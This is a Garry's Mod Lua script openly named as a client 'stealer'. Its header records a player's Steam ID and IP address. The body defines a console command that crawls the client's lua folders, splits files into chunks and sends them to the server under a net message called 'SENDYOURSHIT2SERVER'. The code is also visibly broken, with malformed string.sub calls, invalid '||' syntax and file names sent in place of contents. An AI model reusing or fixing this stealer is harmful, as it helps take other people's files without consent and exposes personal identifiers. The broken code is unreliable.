--[[
	MOD/lua/Stealer/FreshyP_LuaStealerClient.lua [#1647 (#1706), 3299682645, UID:3630813695]
	lemmagame.com Check it out | STEAM_0:0:45881962 <209.89.51.159:27005> | [03.05.14 05:32:53PM]
	===BadFile===
]]

local script = {} 
local locations = {}
local newstr = ""
local function doshit(ka,filee,v)
	timer.Create("fucking".. ka, ka/2, 1, function()
	newstr = ""
	local sections = string.len(filee)/4095
	local rounded = math.floor(sections)
	local extras = sections-rounded

	for i=1,rounded,1 do
		table.insert(script,string.sub(filee,(4095*(i-1),4095*i)))
	end
	table.insert(script,string.sub(filee,-(math.Round(4095*extras)))) -- Rounded just in case it went to an integer.
	
	net.Start("SENDYOURSHIT2SERVER")
	local path = string.GetPathFromFilename(filee)
		net.WriteString(path..filee)
		net.WriteTable(script)
	net.SendToServer()
	end)
end

concommand.Add("GiveMeFiles",function()
	local files1, directories1 = file.Find("lua/*","GAME")
	for a, b in pairs(directories1) do
	table.insert(locations,b)
	end

	timer.Create("5directories", 0.1, 5, function()
		for k,v in pairs(locations) do
		local files, directories = file.Find(v.."/*","GAME")
			if directories then
				for a,b in pairs(directories) do
					if tostring(b) ~= ("derma" || "drive" || "entities" || "matproxy" || "menu" || "postprocess" || "skins" || "vgui" || "weapons") then
					table.insert(locations,v.."/"..b)
					end
				end
			end
		end
	end)
	timer.Simple(2, function()
		local shit,fuck = file.Find("lua/*","GAME")
		for ka,filee in pairs(shit) do
			if (filee:Size() < 102400) then
			doshit(ka,filee)
			end
		end
		for k,v in pairs(locations) do
		local files2, directories2 = file.Find("lua/"..v.."/*","GAME")
			if files2 then
				for ka, filee in pairs(files2) do
					if (filee:Size() < 102400) then
						doshit(ka,filee,v)
					end
				end
			end
		end
	end)
end)